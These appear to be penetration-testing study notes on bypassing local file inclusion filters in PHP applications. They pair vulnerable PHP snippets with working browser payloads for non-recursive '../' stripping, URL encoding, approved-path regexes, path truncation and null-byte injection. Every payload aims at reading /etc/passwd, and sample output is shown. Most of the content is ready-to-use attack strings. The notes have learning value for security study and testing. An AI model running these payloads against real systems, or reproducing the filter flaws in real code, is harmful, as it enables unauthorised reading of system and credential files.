#non-recursive path traversal filters
$language = str_replace('../', '', $_GET['language']);
* this "search and replace filter" is the most basic filter against LFI
- this filter is supposed to remove all occurrence of ../ substrings
- this filter can be easily bypassed as it doesn't apply the filter on the
output string
- bypasses include: ....// ..././ ....\/ or ....////
#approved paths
if(preg_match('/^\.\/languages\/.+$/', $_GET['language'])) {
include($_GET['language']);
} else {
echo 'Illegal path specified!'; <----------indicator
}
BYPASS: VIA NON-RECURSIVE PATH TRAVERSAL FILTER
this method is used when the target has a filter in place that removes the "../" from user input
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=../../../../etc/passwd
* if an error gets displayed or nothing seems to work... it may mean that the
back-end configuration has path traversal filter configured such as
$language = str_replace('../', '', $_GET['language']);
- in cases like this you may be able to bypass via escaping the ../ using ....// etc
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=....//....//....//....//etc/passwd
root:x:0:0:root:/root:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
...
BYPASS: VIA URL ENCODING
this method is used when the target has filters in place that disallow the "." or "/" characters from user input
root@oco:~$ burpsuite
BURP > Decoder
input: ../../../etc/passwd
encode as: URL
output: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
* the vulnerable application will decode the encoded payload
BYPASS: VIA APPROVED PATHS
this method is used when the webapp uses Regular Expressions to ensure that the file being included is under a specific path (e.g., ./languages)
this method is used if the web applications applies multiple filters such as "approved paths", "disallowing file inclusion characters", and "path traversal filters". attackers may be able to bypass the filters by combining all basic bypass techniques; starting with approved path, and then URL encode or recursive payload
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/....//....//....//....//etc/passwd
* this technique combines an approved path with non-recursive filter technique
- approved path and character URL encoding could also have been used
BYPASS: APPENDED EXTENSION
some webapps appends an extension to the input string to ensure that the file the attacker is including is in the expected extension (e.g., .php).
VIA PATH TRUNCATION
this will only work on only work with PHP versions before 5.3/5.4. also for this technique to work, attackers will need to start the path with a non-existing directory and must have a total of 4096 characters payload length to ensure only the .php extension gets truncated and not the requested file at the end of the string (e.g., /etc/passwd)
root@oco:~$ echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
VIA NULL BYTES
PHP versions before 5.5 is vulnerable to null byte injection. this is where adding a null byte (%00) at the end of the string would terminate the string and not consider anything after it. this technique worked due to how strings are stored in low-level memory, where strings in memory must use a null byte to indicate the end of the string, as seen in Assembly, C, or C++ language.
root@oco:~$ BROWSER > {targetSite:port}/index.php/etc/passwd%00.php
* anything after the null byte (%00) would be truncated, and so the path used would
actually be /etc/passwd, leading to the bypass of appended extension.
